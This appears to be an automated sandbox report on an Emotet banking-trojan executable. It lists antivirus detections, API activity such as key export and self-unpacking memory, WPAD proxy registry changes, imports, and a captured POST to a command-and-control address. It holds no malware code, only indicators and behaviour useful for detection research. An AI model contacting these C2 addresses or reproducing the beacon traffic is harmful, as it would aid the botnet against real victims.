6.2
高危
36 个模型检测该样本为恶意!
重新分析
更多

5f2544abea47667cec13be1a5d03da71c2741b7ba3d761cbb212d242e936ab82

6aeb6c7e9beaa10707a35386249df529.exe

分析耗时

79s

最近分析

文件大小

468.0KB
静态报毒 动态报毒 AI SCORE=81 CLASSIC EMOTET GCST GENCIRC GENERICKDZ GENETIC HIGH CONFIDENCE KEPITENKPM POSSIBLE SMHPEMOTETTHD SUSGEN UMEM 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FRX!6AEB6C7E9BEA 20200901 6.0.6.653
Alibaba 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20200901 18.4.3895.0
Tencent Malware.Win32.Gencirc.10cdf97b 20200901 1.0.0.1
Kingsoft 20200901 2013.8.14.323
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1620975754.57525
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1620975744.84125
CryptGenKey
crypto_handle: 0x008b74b8
algorithm_identifier: 0x0000660e ()
provider_handle: 0x008b67d8
flags: 1
key: f á¨J؅¡!yÂhÍï¹
success 1 0
1620975754.60625
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤LTaw{gŽ³k,Jv‘ÀîzŽ™®óÙnÙEWç¡íð ʟõRÈq,ÿ,³þºI´ÃÂfÒª{DÄVFÕZŽˆe¶®†ã«1òõ%1Á¢þûù%ˆ%9âK<bÀŕ
blob_type: 1
flags: 64
success 1 0
1620975790.87225
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤ö0pO.ŠÑk6}|Åñ6€»øe”,®ÿڛ:É3‘m!\¾)§ö]nÁNdÛø>5 Lâ<5™ÝìwYÒmÜDœãW^»? opV¤ –÷«§6‰ €’8‘´¢'Ù ¶
blob_type: 1
flags: 64
success 1 0
1620975797.16925
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤ðvÞFffg¾ö!¶)UöIèûú™§þRk¿”Øê½OuSE“]CŸ:é'Lï8lºD³¾ك~<"‡£9šU£FO.$tcKҐÄ3aeã˽Ùo󑈑Cp&mUŠÅ
blob_type: 1
flags: 64
success 1 0
1620975800.13825
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤‚nðà -™K$#U\«gŠK'üLªö˅ÅÛ;‘O&klñËUÒ¢6{/‡¶©¦ñÞAè²;þ”ÆRÎÓV=,«¿·Õž¼–ž ”ÑގN‚ÈFFäêDs´
blob_type: 1
flags: 64
success 1 0
This executable has a PDB path (1 个事件)
pdb_path c:\Users\Mr.Anderson\Desktop\Vc++ 6.0\27.8.20\CMapEditorCtrl_Demo\Release\MapEd.pdb
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1620975744.04425
NtAllocateVirtualMemory
process_identifier: 2852
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00960000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620975755.13825
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process 6aeb6c7e9beaa10707a35386249df529.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1620975754.73125
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (5 个事件)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 0µ<'H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620975757.71625
RegSetValueExW
key_handle: 0x000003c4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 0µ<'H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620975757.74725
RegSetValueExW
key_handle: 0x000003c0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 个事件)
Bkav W32.KepitenKPM.Trojan
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69777
FireEye Generic.mg.6aeb6c7e9beaa107
McAfee Emotet-FRX!6AEB6C7E9BEA
K7AntiVirus Riskware ( 0040eff71 )
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D11091
TrendMicro Possible_SMHPEMOTETTHD
Cyren W32/Emotet.UMEM-1411
APEX Malicious
Avast Win32:Malware-gen
Kaspersky Trojan-Banker.Win32.Emotet.gcst
BitDefender Trojan.GenericKDZ.69777
ViRobot Trojan.Win32.Emotet.479232.B
Tencent Malware.Win32.Gencirc.10cdf97b
Ad-Aware Trojan.GenericKDZ.69777
DrWeb Trojan.Emotet.1005
VIPRE Trojan.Win32.Generic!BT
Sophos Troj/Emotet-CMB
Jiangmin Trojan.Banker.Emotet.ofx
Microsoft Trojan:Win32/Emotet.PED!MTB
ZoneAlarm Trojan-Banker.Win32.Emotet.gcst
GData Trojan.GenericKDZ.69777
AhnLab-V3 Malware/Win32.Generic.C4188538
ALYac Trojan.Agent.Emotet
MAX malware (ai score=81)
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 Win32/Emotet.CD
TrendMicro-HouseCall Possible_SMHPEMOTETTHD
Rising Trojan.Emotet!1.CB4A (CLASSIC)
Ikarus Trojan-Banker.Emotet
Fortinet W32/Emotet.E88D!tr
MaxSecure Trojan.Malware.105981096.susgen
AVG Win32:Malware-gen
Panda Trj/Genetic.gen
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 个事件)
dead_host 162.144.42.60:8080
dead_host 24.26.151.3:80
dead_host 192.168.56.101:49176
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-28 01:08:15

Imports

Library KERNEL32.dll:
0x43d0f0 GetStartupInfoA
0x43d0f4 GetCommandLineA
0x43d0f8 HeapReAlloc
0x43d0fc TerminateProcess
0x43d100 HeapSize
0x43d10c GetCurrentProcessId
0x43d114 LCMapStringA
0x43d118 LCMapStringW
0x43d11c HeapDestroy
0x43d120 HeapCreate
0x43d124 VirtualFree
0x43d128 IsBadWritePtr
0x43d12c GetStdHandle
0x43d138 VirtualQuery
0x43d144 SetHandleCount
0x43d148 GetFileType
0x43d14c GetStringTypeA
0x43d150 GetStringTypeW
0x43d158 IsBadReadPtr
0x43d15c IsBadCodePtr
0x43d160 SetStdHandle
0x43d168 InterlockedExchange
0x43d16c GetSystemInfo
0x43d170 VirtualProtect
0x43d174 HeapFree
0x43d178 HeapAlloc
0x43d17c RtlUnwind
0x43d180 GetTickCount
0x43d184 GetFileTime
0x43d188 GetFileAttributesA
0x43d190 SetErrorMode
0x43d194 CreateFileA
0x43d198 GetFullPathNameA
0x43d1a0 FindFirstFileA
0x43d1a4 FindClose
0x43d1a8 GetCurrentProcess
0x43d1ac DuplicateHandle
0x43d1b0 GetFileSize
0x43d1b4 SetEndOfFile
0x43d1b8 UnlockFile
0x43d1bc LockFile
0x43d1c0 FlushFileBuffers
0x43d1c4 SetFilePointer
0x43d1c8 WriteFile
0x43d1cc ReadFile
0x43d1d8 RaiseException
0x43d1dc GetOEMCP
0x43d1e0 GetCPInfo
0x43d1e8 GlobalFlags
0x43d1ec TlsFree
0x43d1f4 LocalReAlloc
0x43d1f8 TlsSetValue
0x43d1fc TlsAlloc
0x43d204 TlsGetValue
0x43d20c GlobalHandle
0x43d210 GlobalReAlloc
0x43d218 LocalAlloc
0x43d21c CloseHandle
0x43d220 GetCurrentThread
0x43d224 lstrcmpA
0x43d228 GetModuleFileNameA
0x43d234 lstrcpyA
0x43d23c SetLastError
0x43d240 GlobalFree
0x43d244 MulDiv
0x43d248 GlobalAlloc
0x43d24c GlobalLock
0x43d250 GlobalUnlock
0x43d254 FormatMessageA
0x43d258 LocalFree
0x43d25c FreeResource
0x43d260 GetCurrentThreadId
0x43d264 GlobalGetAtomNameA
0x43d268 GlobalAddAtomA
0x43d26c GlobalFindAtomA
0x43d270 GlobalDeleteAtom
0x43d274 LoadLibraryA
0x43d278 FreeLibrary
0x43d27c lstrcatA
0x43d280 lstrcmpW
0x43d284 lstrcpynA
0x43d288 GetModuleHandleA
0x43d28c GetProcAddress
0x43d290 CompareStringW
0x43d294 CompareStringA
0x43d298 lstrlenA
0x43d29c lstrcmpiA
0x43d2a0 GetVersion
0x43d2a4 MultiByteToWideChar
0x43d2a8 VirtualAlloc
0x43d2ac GetLastError
0x43d2b0 ExitProcess
0x43d2b4 WideCharToMultiByte
0x43d2b8 FindResourceA
0x43d2bc LoadResource
0x43d2c0 LockResource
0x43d2c4 SizeofResource
0x43d2c8 GetVersionExA
0x43d2cc GetThreadLocale
0x43d2d0 GetLocaleInfoA
0x43d2d4 GetACP
Library USER32.dll:
0x43d334 GetDCEx
0x43d338 LockWindowUpdate
0x43d33c PostThreadMessageA
0x43d340 SetParent
0x43d344 SetRect
0x43d348 IsRectEmpty
0x43d34c CharNextA
0x43d350 ReleaseCapture
0x43d354 WindowFromPoint
0x43d358 SetCapture
0x43d35c DestroyMenu
0x43d360 wsprintfA
0x43d364 SetRectEmpty
0x43d368 IsZoomed
0x43d370 MapDialogRect
0x43d374 GetDesktopWindow
0x43d37c GetNextDlgTabItem
0x43d380 EndDialog
0x43d384 GetMessageA
0x43d388 TranslateMessage
0x43d38c GetActiveWindow
0x43d390 ValidateRect
0x43d394 SetCursor
0x43d398 PostQuitMessage
0x43d39c InflateRect
0x43d3a0 EndPaint
0x43d3a4 BeginPaint
0x43d3a8 GetWindowDC
0x43d3ac ClientToScreen
0x43d3b0 GrayStringA
0x43d3b4 DrawTextExA
0x43d3b8 DrawTextA
0x43d3bc TabbedTextOutA
0x43d3c0 SetMenuItemBitmaps
0x43d3c4 ModifyMenuA
0x43d3c8 GetMenuState
0x43d3cc EnableMenuItem
0x43d3d0 CheckMenuItem
0x43d3d8 IsWindowEnabled
0x43d3dc MoveWindow
0x43d3e0 SetWindowTextA
0x43d3e4 IsDialogMessageA
0x43d3e8 SetDlgItemInt
0x43d3ec GetDlgItemInt
0x43d3f4 GetCapture
0x43d3f8 SetWindowsHookExA
0x43d3fc CallNextHookEx
0x43d400 GetClassLongA
0x43d404 GetClassInfoExA
0x43d408 GetClassNameA
0x43d40c SetPropA
0x43d410 GetPropA
0x43d414 RemovePropA
0x43d418 SendDlgItemMessageA
0x43d41c GetFocus
0x43d420 IsWindow
0x43d424 SetFocus
0x43d428 IsChild
0x43d42c GetWindowTextA
0x43d430 GetForegroundWindow
0x43d434 GetLastActivePopup
0x43d438 SetActiveWindow
0x43d43c DispatchMessageA
0x43d440 BeginDeferWindowPos
0x43d444 EndDeferWindowPos
0x43d448 GetDlgItem
0x43d44c GetTopWindow
0x43d450 DestroyWindow
0x43d454 UnhookWindowsHookEx
0x43d458 GetMessageTime
0x43d45c GetMessagePos
0x43d460 PeekMessageA
0x43d464 MapWindowPoints
0x43d468 GetKeyState
0x43d46c DrawStateA
0x43d470 EqualRect
0x43d474 DrawFocusRect
0x43d478 GetClientRect
0x43d47c ScreenToClient
0x43d480 GetDC
0x43d484 ReleaseDC
0x43d488 EnableScrollBar
0x43d48c SetTimer
0x43d490 KillTimer
0x43d494 EnableWindow
0x43d498 LoadCursorA
0x43d49c GetCursorPos
0x43d4a0 GetScrollRange
0x43d4a4 SetScrollPos
0x43d4a8 GetScrollPos
0x43d4ac SetForegroundWindow
0x43d4b0 ShowScrollBar
0x43d4b4 IsWindowVisible
0x43d4b8 UpdateWindow
0x43d4bc GetMenu
0x43d4c0 PostMessageA
0x43d4c4 GetSubMenu
0x43d4c8 GetMenuItemID
0x43d4cc GetMenuItemCount
0x43d4d0 GetSysColor
0x43d4d4 AdjustWindowRectEx
0x43d4d8 GetParent
0x43d4dc DeferWindowPos
0x43d4e0 GetScrollInfo
0x43d4e4 SetScrollInfo
0x43d4e8 RegisterClassA
0x43d4ec UnregisterClassA
0x43d4f0 GetDlgCtrlID
0x43d4f4 CallWindowProcA
0x43d4f8 GetWindowLongA
0x43d4fc SetWindowLongA
0x43d500 SetWindowPos
0x43d504 MessageBeep
0x43d508 GetNextDlgGroupItem
0x43d50c InvalidateRgn
0x43d510 WinHelpA
0x43d518 GetSysColorBrush
0x43d51c DefWindowProcA
0x43d520 GetClassInfoA
0x43d524 DrawIcon
0x43d528 SendMessageA
0x43d52c IsIconic
0x43d530 InvalidateRect
0x43d534 LoadIconA
0x43d538 InSendMessage
0x43d53c CreateWindowExA
0x43d540 ShowWindow
0x43d544 GetSystemMetrics
0x43d548 MessageBoxA
0x43d54c LoadStringA
0x43d550 LoadBitmapA
0x43d554 CharUpperA
0x43d558 GetWindow
0x43d55c PtInRect
0x43d560 CopyRect
0x43d564 GetWindowRect
0x43d568 GetWindowPlacement
0x43d570 IntersectRect
0x43d574 OffsetRect
Library GDI32.dll:
0x43d034 SetRectRgn
0x43d038 CombineRgn
0x43d03c GetMapMode
0x43d040 PatBlt
0x43d044 GetTextMetricsA
0x43d04c GetTextColor
0x43d050 GetRgnBox
0x43d054 GetStockObject
0x43d058 CreatePatternBrush
0x43d05c DeleteDC
0x43d060 ExtSelectClipRgn
0x43d064 ScaleWindowExtEx
0x43d068 SetWindowExtEx
0x43d06c ScaleViewportExtEx
0x43d070 SetViewportExtEx
0x43d074 OffsetViewportOrgEx
0x43d078 SetViewportOrgEx
0x43d07c Escape
0x43d080 ExtTextOutA
0x43d084 TextOutA
0x43d088 RectVisible
0x43d08c GetBkColor
0x43d090 CreatePen
0x43d094 GetWindowExtEx
0x43d098 GetViewportExtEx
0x43d09c CreateRectRgn
0x43d0a0 SelectClipRgn
0x43d0a4 DeleteObject
0x43d0a8 IntersectClipRect
0x43d0ac ExcludeClipRect
0x43d0b0 SetMapMode
0x43d0b4 RestoreDC
0x43d0b8 SaveDC
0x43d0bc GetDeviceCaps
0x43d0c0 CreateBitmap
0x43d0c4 GetObjectA
0x43d0c8 SetBkColor
0x43d0cc SetTextColor
0x43d0d0 GetClipBox
0x43d0d4 BitBlt
0x43d0d8 Polyline
0x43d0dc SelectObject
0x43d0e0 CreateCompatibleDC
0x43d0e8 PtVisible
Library MSIMG32.dll:
0x43d2e0 TransparentBlt
Library comdlg32.dll:
0x43d58c GetFileTitleA
Library WINSPOOL.DRV:
0x43d57c OpenPrinterA
0x43d580 DocumentPropertiesA
0x43d584 ClosePrinter
Library ADVAPI32.dll:
0x43d000 RegOpenKeyA
0x43d004 RegQueryValueExA
0x43d008 RegOpenKeyExA
0x43d00c RegDeleteKeyA
0x43d010 RegEnumKeyA
0x43d014 RegQueryValueA
0x43d018 RegCreateKeyExA
0x43d01c RegSetValueExA
0x43d020 RegCloseKey
Library COMCTL32.dll:
0x43d028
Library SHLWAPI.dll:
0x43d31c PathFindFileNameA
0x43d320 PathStripToRootA
0x43d324 PathFindExtensionA
0x43d328 PathIsUNCA
Library oledlg.dll:
0x43d5d4
Library ole32.dll:
0x43d598 CoGetClassObject
0x43d59c CLSIDFromString
0x43d5a0 CLSIDFromProgID
0x43d5a8 CoTaskMemFree
0x43d5b0 OleUninitialize
0x43d5bc OleFlushClipboard
0x43d5c4 CoRevokeClassObject
0x43d5c8 CoTaskMemAlloc
0x43d5cc OleInitialize
Library OLEAUT32.dll:
0x43d2e8 VariantClear
0x43d2ec VariantChangeType
0x43d2f0 VariantInit
0x43d2f4 SysAllocStringLen
0x43d2f8 SysFreeString
0x43d2fc SysStringLen
0x43d304 VariantCopy
0x43d308 SafeArrayDestroy
0x43d310 SysAllocString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49238 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/Wrj8MM/ 
POST /Wrj8MM/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------6e880b484c0091854bf3b0967f7c20e4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.